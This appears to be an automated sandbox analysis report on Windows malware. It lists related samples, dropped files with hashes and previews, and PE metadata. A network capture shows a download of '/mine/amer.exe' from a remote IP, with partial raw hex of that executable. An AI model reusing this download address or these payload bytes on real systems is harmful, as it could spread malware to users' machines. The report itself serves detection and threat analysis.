	Adobe-Reader-v8.0-latest-installer.exe	Get hash	malicious	GuLoader	Browse	104.21.21.16
	Eql9yOkOrJ.exe	Get hash	malicious	Vidar	Browse	104.21.21.16
	Eql9yOkOrJ.exe	Get hash	malicious	Vidar	Browse	104.21.21.16
	9moLZUm8FT.exe	Get hash	malicious	Amadey, RHADAMANTHYS	Browse	104.21.21.16
	paradise.exe	Get hash	malicious	Vidar	Browse	104.21.21.16
	paradise.exe	Get hash	malicious	Vidar	Browse	104.21.21.16
	out.js	Get hash	malicious	Unknown	Browse	104.21.21.16
	out.js	Get hash	malicious	Unknown	Browse	104.21.21.16
	citacionpoderjudicl.msi	Get hash	malicious	Unknown	Browse	104.21.21.16
	R5504576_GG001_1054173_8065325_333090_04000_PT_PD_1.cmd	Get hash	malicious	GuLoader	Browse	104.21.21.16
	nso7806.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	Screenshot.cmd	Get hash	malicious	GuLoader, XWorm	Browse	104.21.21.16
	out.js	Get hash	malicious	Unknown	Browse	104.21.21.16
	out.js	Get hash	malicious	Unknown	Browse	104.21.21.16
	file.exe	Get hash	malicious	Xmrig	Browse	104.21.21.16
	qZSULDXKfu.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.21.16
	SecuriteInfo.com.Win32.Evo-gen.26849.8476.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.6407.21148.exe	Get hash	malicious	Unknown	Browse	104.21.21.16

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1819404518888397
Encrypted:	false
SSDEEP:	192:9RRMqeFy/9P0lLyJejez2ZrjBBldzuiF4Z24IO8Z8:bRMs98lLyJeje6nzuiF4Y4IO8Z
MD5:	8C64E15A6B15878781AC0FC75A261DC9
SHA1:	E1C14F4E8CD3F9ED2E041C7A0DDF43B3654125DE
SHA-256:	19146D75E59F8ADF275107878D5F0EB7153A3D98A8953B2A3E3AFA1396335BA0
SHA-512:	F0C652B1B067FC6F37A9CBDE844289132201D90B6994F6C8617B39DD04450D8DFBD0370C642D601BEB8D57CE2B7F7AD75D8509AD067BC771783274C634A7ED24
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.0.0.0.8.0.7.7.1.7.5.8.8.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.0.0.0.8.0.9.0.9.1.8.7.5.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.b.6.c.1.9.8.-.e.6.8.3.-.4.5.b.2.-.a.0.9.9.-.3.1.b.f.f.2.4.d.2.b.1.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.a.8.7.f.a.f.-.d.a.4.1.-.4.b.9.e.-.9.1.6.e.-.1.5.9.2.5.7.f.d.b.1.8.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.e.c.-.0.0.0.1.-.0.0.1.5.-.f.9.a.1.-.e.7.a.a.9.d.4.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7830
Entropy (8bit):	5.15844280595936
Encrypted:	false
SSDEEP:	192:gFBMimATcbhbVbTbfbRbObtbyEl7n4rNJA6unSrDtTZdxSof2:gFiucNhnzFSJYrI1nSrDhZdxK
MD5:	2E1D3CEFA94C1EE2AFBE99EFB80A95A2
SHA1:	989E4E30439D18F07251D2E716F7DEFAB3E46840
SHA-256:	04B2A282089259BF197069C71A0D50A1107E1050AE698AFCAD22E3535E75823D
SHA-512:	3235E515134B02DBA2CEE009B5EB4802DA0894B83AFBDE2FAFC9C9192BC6837E5A477C84BF60E48E50727D6041ACB221FABDF8E237C2FF33A6C3C5E60BA0C70B
Malicious:	false
Reputation:	unknown
Preview:	{"type":"uninstall","id":"14b615bc-a80e-4e59-977b-201c3e8ea9da","creationDate":"2024-01-18T01:23:51.977Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"7340e351-fad3-4a0f-b554-971fbfafe8fb","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44894
Entropy (8bit):	6.095646567971906
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWjsi1zNt9mUNyXzGFMKJDSgzMMd6qD47u3+Ciob:+/Ps+wsI7yne1sKtSmd6qE7lFob
MD5:	5186D7FD9F235656B86F204DFEF2B13B
SHA1:	A28EC8D6F405DB4ABED4BC3EF7C2DD20A6EAB6FD
SHA-256:	E95916D3737E02DC7D3DA204F91015DD136E6AF6CDF1AFA76630DF4901D881F2
SHA-512:	DA208CEE7F88E2FC7FED302446B44C19F557E78D3427F9F77AADD48BF0AA4326FDA4C43557D1A217208942FB4AA43E9EB8B906EC03E1A4BAFE0DABE35DB5D877
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

Process:	C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	367616
Entropy (8bit):	7.868902079164761
Encrypted:	false
SSDEEP:	6144:7Lnm91i1m7pJ4OlXq/XN3qq1BCDcFJ5eUE8Dod5w6EUdEjzOdIj:Pm90E7pJvq/t8cFJ5vELrTdEjz
MD5:	70A53CEA1F5F40353D5F6A6BF02A95C0
SHA1:	E8A936CD25241CA66DEAFE300E87F81F376E63CC
SHA-256:	D884369789550A8A68F06719E4D8B5378179ED94435B8AFB7BC2EADAADE695E6
SHA-512:	2B28B3C2BCD9114904848F6167ABD7C9B977D6CD56789E35D698972CECA0F5D0354BB39FD2C2FC2FAA6A90301875508378F81E9101437BEADEC586C8AC430B02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nX.e................................. ........@.. ..............................U3....`.................................p...K.......B........................................................................... ............... ..H............text....... ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B........................H.......,...PY..........\|................................................0..V.......~....:K.........(.... .... .... ....s....(............(....(.... ....?....r...ps....z...(,...(.....0.......... .......... ............8.......(...........i]....X.. ....?........8$.......X...X ....]...................X.. ....?...........8......X ....].....X ....]..................&...& .=.e 5..Pa~y...{....a(....(...............X ....]..........%q........a........X......i?w.................&

Process:	C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1388032
Entropy (8bit):	7.984359427417673
Encrypted:	false
SSDEEP:	24576:BvDkFjI51Dta/7Q++3OP4fNXP2ltMGbVRO/LpgP0I5a5BzRznROFQIyrGn:BvgyHtg7ie0NXP+ZCTI5aDzCCIyrGn
MD5:	F3CFA7E6835A51B52B5B2F4173C5D047
SHA1:	93F1E90F3D19D26627064E64D691D28479C67273
SHA-256:	265BA94B8B506CB5CF03BEEFBAB38AA9358801E0F8420226E120A224D18262EA
SHA-512:	8259F98C1F1473CF9C3C4A66BAA822AC74328F8DFAD1883CD2F4CD23CF31CA17ED2369D308E86079694C132BE834DFE047F8FD1ACA84DE5500C0123CA752E87A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wD..3%..3%..3%..hM..=%..hM...%..hM.. %...H..!%...H..'%...H..F%..hM.."%..3%...%...K..2%...Ko.2%...K..2%..Rich3%..........................PE..L...l.e..............................?...... ....@...........................@...........@... .. .... .. ..................P.1.<...........................0.1...............................1......................................................................<..................@............ ... ...j...@..............@............P...@......................@.......................................@............P.......<..................@....rsrc...............................@.............).........................@....data....@....0..@..................@...........................................................................................................................................................................

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (533)
Category:	downloaded
Size (bytes):	5547
Entropy (8bit):	5.234104150395812
Encrypted:	false
SSDEEP:	96:+E8YzVFXsVws8HYnkfI+C4yVdbaiGkNF2LSaAuEeRzgf5j6YJR79hamaWslv0Rw:+ajsVws8Hlzg2i/N9hzWgf5jhJR79haZ
MD5:	936A7C8159737DF8DCE532F9EA4D38B4
SHA1:	8834EA22EFF1BDFD35D2EF3F76D0E552E75E83C5
SHA-256:	3EA95AF77E18116ED0E8B52BB2C0794D1259150671E02994AC2A8845BD1AD5B9
SHA-512:	54471260A278D5E740782524392249427366C56B288C302C73D643A24C96D99A487507FBE1C47E050A52144713DFEB64CD37BC6359F443CE5F8FEB1A2856A70A
Malicious:	false
Reputation:	unknown
URL:	https://www.youtube.com/s/desktop/80338919/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
Preview:	/.. Copyright 2016 Google Inc. All Rights Reserved... Licensed under the W3C SOFTWARE AND DOCUMENT NOTICE AND LICENSE... https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document../.(function(f,h){function t(a){this.time=a.time;this.target=a.target;this.rootBounds=a.rootBounds;this.boundingClientRect=a.boundingClientRect;this.intersectionRect=a.intersectionRect\|\|q();this.isIntersecting=!!a.intersectionRect;a=this.boundingClientRect;a=a.widtha.height;var b=this.intersectionRect;b=b.widthb.height;this.intersectionRatio=a?b/a:this.isIntersecting?1:0}function d(a,b){b=b\|\|{};if("function"!=typeof a)throw Error("callback must be a function");if(b.root&&1!=b.root.nodeType)throw Error("root must be an Element");.this.g=y(this.g.bind(this),this.B);this.D=a;this.h=[];this.i=[];this.s=this.L(b.rootMargin);this.thresholds=this.J(b.threshold);this.root=b.root\|\|null;this.rootMargin=this.s.map(function(c){return c.value+c.unit}).join(" ")}function y(a,b){var c=null;return function

Entrypoint:	0x576a8e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65A8393A [Wed Jan 17 20:31:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x176a40	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x178000	0x5b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1769f8	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x174a94	0x174c00	False	0.994450426517438	data	7.998374007382508	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x178000	0x5b8	0x600	False	0.4407552083333333	data	4.151384025244951	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17a000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1780a0	0x32c	data			0.45320197044334976
RT_MANIFEST	0x1783cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:34:19.725063086 CET	222	OUT	HEAD /mine/amer.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 185.215.113.68 Cache-Control: no-cache
Jan 18, 2024 00:34:19.964304924 CET	269	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:19 GMT Content-Type: application/octet-stream Content-Length: 1388032 Last-Modified: Thu, 18 Jan 2024 07:20:25 GMT Connection: keep-alive ETag: "65a8d139-152e00" Accept-Ranges: bytes
Jan 18, 2024 00:34:19.973813057 CET	221	OUT	GET /mine/amer.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 185.215.113.68 Cache-Control: no-cache
Jan 18, 2024 00:34:20.214221954 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:20 GMT Content-Type: application/octet-stream Content-Length: 1388032 Last-Modified: Thu, 18 Jan 2024 07:20:25 GMT Connection: keep-alive ETag: "65a8d139-152e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 44 fe d8 33 25 90 8b 33 25 90 8b 33 25 90 8b 68 4d 93 8a 3d 25 90 8b 68 4d 95 8a ad 25 90 8b 68 4d 94 8a 20 25 90 8b e6 48 94 8a 21 25 90 8b e6 48 93 8a 27 25 90 8b e6 48 95 8a 46 25 90 8b 68 4d 91 8a 22 25 90 8b 33 25 91 8b e3 25 90 8b a8 4b 99 8a 32 25 90 8b a8 4b 6f 8b 32 25 90 8b a8 4b 92 8a 32 25 90 8b 52 69 63 68 33 25 90 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 6c d6 96 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 0a 05 00 00 b0 01 00 00 00 00 00 0c fb 3f 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 40 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 00 31 00 3c 02 00 00 00 f0 06 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 00 10 00 00 00 3c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 01 00 00 20 05 00 00 6a 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 40 06 00 00 0a 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 90 06 00 00 00 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 a0 06 00 00 3c 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 10 00 00 00 f0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 d0 29 00 00 00 07 00 00 fc 02 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 40 0f 00 00 d0 30 00 00 40 0f 00 00 ee 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wD3%3%3%hM=%hM%hM %H!%H'%HF%hM"%3%%K2%Ko2%K2%Rich3%PELle? @@@ P1<011<@ j@@P@@@P<@.rsrc@)@.data@0@@
Jan 18, 2024 00:34:20.214354992 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 29 a3 ed 93 0c a7 bd c2 13 00 6c e7 8d df 52 2e b0 cb f1 41 57 85 b5 fe 65 dc a7 6c 70 ff 2e e9 15 27 4a 0b 98 0c 16 4a b0 b3 ce 7f a0 02 23 e5 db 9a 03 0d 4a e2 ab 08 14 cd 5c 55 07 9f 40 e8 5e 1b 47 8c 44 1c e3 0e 04 52 81 Data Ascii: )lR.AWelp.'JJ#J\U@^GDRjQV_-N7!LX<wwlE/iC8HITD8Fu6Y>F &\Mi'1'%&`Z+b+RZWN;.LU=PrO
Jan 18, 2024 00:34:20.214375973 CET	1286	IN	Data Raw: 21 ef ab 4b de c0 63 1e af 4b d0 b0 73 1f 9f 6e e9 64 36 ed 5b 98 7c 18 e1 67 6d 30 32 71 93 d9 57 c6 a1 de 3b c9 ff dd 29 4c 79 bf 7e 31 8f a0 5c 3e 08 9f 1d ef 6b 0f a7 f0 db 6a 6b cc 5c 39 7c c8 87 b5 64 c5 e1 76 19 6d c2 3e 21 d0 5b 84 0c a6 Data Ascii: !KcKsnd6[\|gm02qW;)Ly~1\>kjk\9\|dvm>![YvE0aTyKh6_Yd6 xTDSk)Z?PsFdk+kK.aBCq"2B{2N% MQB9!ixLF0Ua#IPQvZET
Jan 18, 2024 00:34:20.214391947 CET	1286	IN	Data Raw: 21 54 6b b6 34 c4 14 fa 8a d4 cc 9d 2f 21 9d 17 27 13 78 87 2f 54 cd 8b b5 29 a3 d3 ff d4 a3 3f 68 1c 86 6f 6a 07 f0 0b 4d 24 b6 d1 01 2a 73 b8 57 12 0b 3a 90 36 82 9f 99 be 86 1e 6a 36 cc ef ec 50 85 70 d5 ae e0 9a c4 53 33 0f 31 4a 7c b0 1e 22 Data Ascii: !Tk4/!'x/T)?hojM$*sW:6j6PpS31J\|"K<!&m4N6u"{z17z0;$Y5e 58mt06$rRH&a.MS@:$?_7g;c+ouw29@
Jan 18, 2024 00:34:20.214409113 CET	1286	IN	Data Raw: 07 0a ea c8 86 3a 84 cb 7e 46 15 37 20 65 2a 20 6a 7f 83 8a 76 8d 6f 7a a8 0c a2 4c 94 e9 1b ef 24 dd 88 c0 d6 95 19 5f f0 38 05 af f8 47 58 e0 e0 70 1e 96 4d f6 6c 64 ef 77 aa 71 65 f8 e3 81 8d 83 a4 7e 1d 9d f9 83 bc 6a 55 5b 93 67 bc fd e8 c8 Data Ascii: :~F7 e* jvozL$_8GXpMldwqe~jU[g]}_bHK`DHNh;{Ssda\|wfqx,}I'8Y#F+8J5a8sD5#V<'i}4+Cqe"&\F8cQW
Jan 18, 2024 00:34:20.214520931 CET	1286	IN	Data Raw: 0d a9 e0 d2 fb f4 49 00 21 c1 0e ed ee d9 fa 91 df f4 8c b6 cf 4d 8a 63 a3 19 43 09 0d ef f7 91 31 31 d8 a7 56 6d 81 7e 47 7e 7f 75 96 59 fe 39 41 dc 16 d3 da 73 ea 18 ed 9f 01 ee e2 7b e2 38 3a d4 ec ea 5b b1 58 db b2 b1 02 77 87 54 24 50 d6 a4 Data Ascii: I!McC11Vm~G~uY9As{8:[XwT$Pl/ntKJ~vYYjliB?AQ?D5N};Yze\|j%<@0_-Guct*OqYO(\&IQ<8T7i\|!(O2
Jan 18, 2024 00:34:20.214539051 CET	1286	IN	Data Raw: c7 24 12 07 34 3f eb 83 20 13 6e ae 8d 1c b0 3d 65 fa af be 33 3d bc 27 70 8c 06 72 23 d6 f2 b4 22 84 4c 4b f5 36 6d 1b cb 52 9b 7b dd d9 ec 52 a6 13 a4 29 77 8d 05 fd 14 42 c7 35 13 f7 40 46 f9 31 24 5c b3 5a de 59 9a 02 51 52 da ea 43 d6 bd eb Data Ascii: $4? n=e3='pr#"LK6mR{R)wB5@F1$\ZYQRC@O,b *x(2JZN(i1if\B[v+'bCsxB!;;2Lesu@Ag,0S~^x=JvUDrK-&<iot
Jan 18, 2024 00:34:20.214770079 CET	1286	IN	Data Raw: ba e3 da 1c 51 03 2e 1d 24 62 07 69 ef 45 b2 f9 f6 b3 df 6b 4b 4c aa 51 c4 09 35 d2 94 e8 a7 f6 69 22 d1 dd 6d 40 e5 ce 2e 66 b7 44 9f 9a ac d3 cc 3c db de 37 f1 06 64 22 38 16 62 a8 be a1 50 42 fd b6 f3 65 4b 8b 06 f3 3a 33 27 6c 48 49 3e 39 c6 Data Ascii: Q.$biEkKLQ5i"m@.fD<7d"8bPBeK:3'lHI>9h/omvMIMTAJ4Q.,.';!ZO6[^qDYHnt+f20Usn6oR/M#,v*/BJDf\|ZwYroMU~Syi])
